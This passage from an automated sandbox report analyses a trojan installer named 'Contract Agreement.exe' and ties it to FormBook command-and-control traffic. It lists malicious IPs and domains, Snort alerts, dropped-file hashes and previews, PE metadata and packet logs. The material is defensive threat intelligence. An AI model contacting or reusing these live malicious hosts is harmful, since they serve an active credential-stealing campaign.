                                http://www.typography.netDexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.%s.comPAexplorer.exe, 00000003.00000002.908299208.0000000002B50000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://www.fonts.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.111.179.147
                                        		www.sapanyc.comUnited States
                                        		18779EGIHOSTINGUStrue
                                        72.52.251.1
                                        		bizcert360.comUnited States
                                        		32244LIQUIDWEBUStrue

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:385426
                                        Start date:12.04.2021
                                        Start time:13:50:14
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 37s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Contract Agreement.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/3@4/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 23.3% (good quality ratio 21%)
                                        • Quality average: 73.1%
                                        • Quality standard deviation: 31.2%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.3.254, 168.61.161.212, 13.107.246.254, 52.255.188.83, 40.88.32.150, 13.64.90.137, 13.88.21.125, 20.50.102.62, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385426/sample/Contract Agreement.exe

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        142.111.179.147Drawings2.exeGet hashmaliciousBrowse
                                          72.52.251.1http://gama-grow.bid/Need-to-send-the-attachment/Get hashmaliciousBrowse
                                          • raffiaempire.com/Vyqcaw/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.sapanyc.comDrawings2.exeGet hashmaliciousBrowse
                                          • 142.111.179.147

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          LIQUIDWEBUSvbc.exeGet hashmaliciousBrowse
                                          • 67.225.129.56
                                          RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exeGet hashmaliciousBrowse
                                          • 173.199.133.192
                                          Formbook.exeGet hashmaliciousBrowse
                                          • 67.225.138.69
                                          3yhInKB1T7.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          mjXMOZg9Hx.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          Eyej9j4lMJ.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          37Hn9kZ0tg.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          RzHfC7fIWU.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          SELyJGbTey.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          oeve2OjHY2.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          j1zGasR46N.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          QHM2AdS9Ik.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          oSGsMCawfC.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          fr3o86AGId.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          zmIT0LdaEl.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          KeP1U6sRJ0.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          mRa0raLv0K.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          sHiqqe9Szk.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          Q6bIUSu1EB.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          HfLT9YNvlQ.exeGet hashmaliciousBrowse
                                          • 72.52.178.23
                                          EGIHOSTINGUSs6G3ZtvHZg.exeGet hashmaliciousBrowse
                                          • 142.111.76.118
                                          g2qwgG2xbe.exeGet hashmaliciousBrowse
                                          • 142.111.47.2
                                          winlog.exeGet hashmaliciousBrowse
                                          • 104.252.75.179
                                          1ucvVfbHnD.exeGet hashmaliciousBrowse
                                          • 142.111.47.2
                                          PO#560.zip.exeGet hashmaliciousBrowse
                                          • 50.118.194.26
                                          PO4308.exeGet hashmaliciousBrowse
                                          • 104.164.33.210
                                          PO7321.exeGet hashmaliciousBrowse
                                          • 104.164.33.210
                                          SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                          • 107.164.194.71
                                          RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                          • 104.252.75.179
                                          RFQ-415532-Refractory Materials for KNPC PROJECT_Tender in Kuwait...xlsx.exeGet hashmaliciousBrowse
                                          • 107.165.116.66
                                          Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                          • 107.186.223.220
                                          PO PL.exeGet hashmaliciousBrowse
                                          • 107.186.125.46
                                          PO#7689.zip.exeGet hashmaliciousBrowse
                                          • 50.118.194.26
                                          2021-04-01.exeGet hashmaliciousBrowse
                                          • 107.186.80.12
                                          PI.exeGet hashmaliciousBrowse
                                          • 104.252.75.130
                                          Inquiry.docxGet hashmaliciousBrowse
                                          • 50.118.194.27
                                          BL Draft copy.exeGet hashmaliciousBrowse
                                          • 107.186.80.9
                                          g0g865fQ2S.exeGet hashmaliciousBrowse
                                          • 142.111.47.2
                                          FTT103634332.exeGet hashmaliciousBrowse
                                          • 50.117.53.247
                                          PaymentInvoice.exeGet hashmaliciousBrowse
                                          • 107.186.80.174

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dll
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.077319736133544
                                          Encrypted:false
                                          SSDEEP:48:a97yzI322w3MWZhfChEsHIGmEsH/Gt4BKiZ/seNkTHfav6yYZmEeSRuqS+:1zIHw3T4IGN4/GCBKxfQKuix7
                                          MD5:7136D4F48A008EC08F3DE8BB41065DF0
                                          SHA1:0BF2944FB2CEA04138870901113FB6179B66D958
                                          SHA-256:24321D89754E1178D429E12E2D36AE449B029DF0AE4926D08F6119371CBB0B31
                                          SHA-512:11E770FA3690E37780B7C1BAFCFE57181B9F115F42616CC841C9FD2117294DAE6B9E8E916110DB6E19A613FA4DC10372B7E5AFCE8C967B1912DE6048D434803B
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 4%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5K..fK..fK..f_..gZ..fK..fw..f...gJ..f...gJ..f..{fJ..f...gJ..fRichK..f........................PE..L....ys`...........!......................... ...............................`............@.........................P ..P....1.......@.......................P......0 ...............................................0...............................code............................... ....data...|.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\shkkjqaazzgu5ta0vz0z
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.998906533936236
                                          Encrypted:true
                                          SSDEEP:3072:QbcqOmirtMUEOdvFo1FUhU94i19VXuFAzpd067/AtG0s5fPkmATTvfrn/ynWlpWi:QbcqOmuNjVODr4i19VXuO06LAtSXpIT9
                                          MD5:17216972B337142D42789E2AB0FAC4A1
                                          SHA1:AFD4498616554CEFE685F8540F6F673E28C44899
                                          SHA-256:986A68A9C59786112F323E8ED96386EEA52B40570EAF9DC0CEB92FBAD39059D3
                                          SHA-512:136D71730084075360298F20B3263E753743C8759DB197AB7F0D9DB570AF2DF9126198CF8D461AB4DA20415F3C1FA5D5603C8D4901468794AA9910D1E725A583
                                          Malicious:false
                                          Reputation:low
                                          Preview: ...'~...>...2.....j.=.sT.,..R...R.T...,.l..n ...x.)..T.X........?.<CKz#..,...V..G.....]..u.'....V..#...JO>-......(:.z.....c..,..o....._...f.....vVQ.S......-...!.....$...[....B.-...O.......:...7.e7.[.).%.Q2...dl..u...>.5#...I.....O......pq......I..7,\<M.B|...u'2....R>."...mX.....`...R.......[..q.R...7.{F..^..`9.F{|z.?.6...$.....:......_....}9.....=>/.o.............(...4.,'}..w..o...%.F...$.Fn^z..t...cp...pVY..7#V....a...z+..~.!.nY.^....u..k..8&...U......$.".qq.....w..\V....nJ...e.......mmo2w..j...o.U$........&%....&I.....e..V.,)N.v..3D..q0.5.......W.<...J.06.z6.."..c....*c..7..H.......h.;.[.).r.+"....:s.Ur3...R........L.A~..".p..A...M.0;...s.o..O..H4r..(.....*U.....u...`e.D..8....4w3....n.y.V.....Q;l].z.V.,...-.0........wI.-S-z.yH..k..Gf.76.iA$.......BNs6..X ..L..WYs.Y.$@.$..\A..@.Y...z..h..7...I._".1..:.._I%..7.W......Y.,.Zi'!.m... GlA.$.....CqO.I...>..C@..C......?.Q....2N...hi.xh.,-.B4.sC.MW`..7.:.....d.q.6Z...U....s._...+Z......l.@#..T...I...
                                          C:\Users\user\AppData\Local\Temp\t86ufazvin9p7ygm
                                          Process:C:\Users\user\Desktop\Contract Agreement.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.961735036957541
                                          Encrypted:false
                                          SSDEEP:192:rC4kxgfjm6H8jw4L79RFiLowKKdk1tHQOnvI3g:reSH8jn7FiLorek1BRIQ
                                          MD5:CA7A2887FB88245E29FB37E1498D2B58
                                          SHA1:6D5E7B19A938CF0B59EECEFA0F0C844407C3330F
                                          SHA-256:808BA0EF85D8C8960D2F9071E5B61B514A5F3420CE51C9C294BE59A51F9268F1
                                          SHA-512:A0286AF925877CA1D77481C6DAEA1098E18F1187E60A83DDB0A83EFC5A235527EBD9C09653A665D76C6564C028B64C3A4C15F6F9F23C2C9560C0A9BCDB858BBF
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..5Z.w.v.~.e.d....s............../......0..4K!..z.d.TIm.b.}T]....YFCfO.-..e+ ]0......%R?r.|.y6.....F..@.....X.E......jF..d....+.R.^..lK.....tqN.....kZVCH''...LP]ZqZ.X..."?.3'.z..8.....N.w,#....h..~.....Z.Ch....zw.1.k`}.]6s?..Er.[~h.9?ZGL....{I....T...Y....y6d..#.).....7|R.H..J.M.K..... ..0.;.!..+...s8....b8......s....63Vo...*t......t....".,.)f.....N;k......f.D6......@)..=....y..../.jg\;...y.$!>E.....$.38...~.....!.B.K.v......h%{...e`rM.............-(o`}....sHE...u~[...s@.<..@... .V..."7.o...-.V...[q........k."6....E...Cg.....5^...-.wt.]lYF9..2.t;"G{.^C...iz..$...xd.3.r............S..t.. ..I...IE...%......dG* .Hs...Ol.P.......x.f!...1,...m.i%"?va......=.sw)..Q..fC"...|...H...d.hCh.....$.......5.j<.q.X....D.<...<-nN%}(n.a...6r.....H./.7V......'.P..<.....$2T..$K.|....yx..T.#.[.gl'.\q.....+.#^W....r.]$+..&..Z9.<...>DKZ.........................|...i.....6w.K.>Bfk|`BGHugsq%..\!ZW....8l.?......R.2......'!..;8....y.E..r.Y.....y.}...

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.918030370335679
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Contract Agreement.exe
                                          File size:228086
                                          MD5:75612f2e3922d80afe14068c3a510c99
                                          SHA1:ade818e1272e6131c504273ca678ff805d01d41d
                                          SHA256:913b12686b62bfbaa6cd0169c2b37bb2d06d095335f3ac14047ec49d3a755b2d
                                          SHA512:a755c8215b1ff95ab9476585b74b0fee751174e4eb2152a188683a40fda48a336ec777f28b8ecc52670202e1a88aca098c680cc53019acb4824d618c4bbb39c6
                                          SSDEEP:6144:HdP4bcqOmuNjVODr4i19VXuO06LAtSXpITmneW9wR:dyKNjUVXuO06cbTmneW98
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40314a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 0000017Ch
                                          push ebx
                                          push ebp
                                          push esi
                                          xor esi, esi
                                          push edi
                                          mov dword ptr [esp+18h], esi
                                          mov ebp, 00409240h
                                          mov byte ptr [esp+10h], 00000020h
                                          call dword ptr [00407030h]
                                          push esi
                                          call dword ptr [00407270h]
                                          mov dword ptr [007A3030h], eax
                                          push esi
                                          lea eax, dword ptr [esp+30h]
                                          push 00000160h
                                          push eax
                                          push esi
                                          push 0079E540h
                                          call dword ptr [00407158h]
                                          push 00409230h
                                          push 007A2780h
                                          call 00007F087CB76218h
                                          mov ebx, 007AA400h
                                          push ebx
                                          push 00000400h
                                          call dword ptr [004070B4h]
                                          call 00007F087CB73959h
                                          test eax, eax
                                          jne 00007F087CB73A16h
                                          push 000003FBh
                                          push ebx
                                          call dword ptr [004070B0h]
                                          push 00409228h
                                          push ebx
                                          call 00007F087CB76203h
                                          call 00007F087CB73939h
                                          test eax, eax
                                          je 00007F087CB73B32h
                                          mov edi, 007A9000h
                                          push edi
                                          call dword ptr [00407140h]
                                          call dword ptr [004070ACh]
                                          push eax
                                          push edi
                                          call 00007F087CB761C1h
                                          push 00000000h
                                          call dword ptr [00407108h]
                                          cmp byte ptr [007A9000h], 00000022h
                                          mov dword ptr [007A2F80h], eax
                                          mov eax, edi
                                          jne 00007F087CB739FCh
                                          mov byte ptr [esp+10h], 00000022h
                                          mov eax, 00000001h

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                          RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                          RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                          USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                          SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          04/12/21-13:51:58.358809TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.4142.111.179.147
                                          04/12/21-13:51:58.358809TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.4142.111.179.147
                                          04/12/21-13:51:58.358809TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.4142.111.179.147
                                          04/12/21-13:52:19.304376TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.472.52.251.1
                                          04/12/21-13:52:19.304376TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.472.52.251.1
                                          04/12/21-13:52:19.304376TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.472.52.251.1

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 12, 2021 13:51:58.159307957 CEST4975080192.168.2.4142.111.179.147
                                          Apr 12, 2021 13:51:58.358573914 CEST8049750142.111.179.147192.168.2.4
                                          Apr 12, 2021 13:51:58.358721018 CEST4975080192.168.2.4142.111.179.147
                                          Apr 12, 2021 13:51:58.358808994 CEST4975080192.168.2.4142.111.179.147
                                          Apr 12, 2021 13:51:58.558334112 CEST8049750142.111.179.147192.168.2.4
                                          Apr 12, 2021 13:51:58.561944008 CEST8049750142.111.179.147192.168.2.4
                                          Apr 12, 2021 13:51:58.561978102 CEST8049750142.111.179.147192.168.2.4
                                          Apr 12, 2021 13:51:58.566862106 CEST4975080192.168.2.4142.111.179.147
                                          Apr 12, 2021 13:51:58.566922903 CEST4975080192.168.2.4142.111.179.147
                                          Apr 12, 2021 13:51:58.766283989 CEST8049750142.111.179.147192.168.2.4
                                          Apr 12, 2021 13:52:19.142992973 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.303884983 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.304124117 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.304375887 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.463366985 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.812648058 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.876868010 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.876897097 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.876910925 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.876959085 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.876988888 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.877928019 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.888386011 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.888438940 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.888464928 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.888492107 CEST4975680192.168.2.472.52.251.1
                                          Apr 12, 2021 13:52:19.973510981 CEST804975672.52.251.1192.168.2.4
                                          Apr 12, 2021 13:52:19.973680019 CEST4975680192.168.2.472.52.251.1

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 12, 2021 13:50:53.274857998 CEST5912353192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:53.326195002 CEST53591238.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:53.356559992 CEST5453153192.168.2.48.8.8.8
                                          Apr 12, 2021 13:50:53.405458927 CEST53545318.8.8.8192.168.2.4
                                          Apr 12, 2021 13:50:53.504723072 CEST4971453192.168.2.48.8.8.8
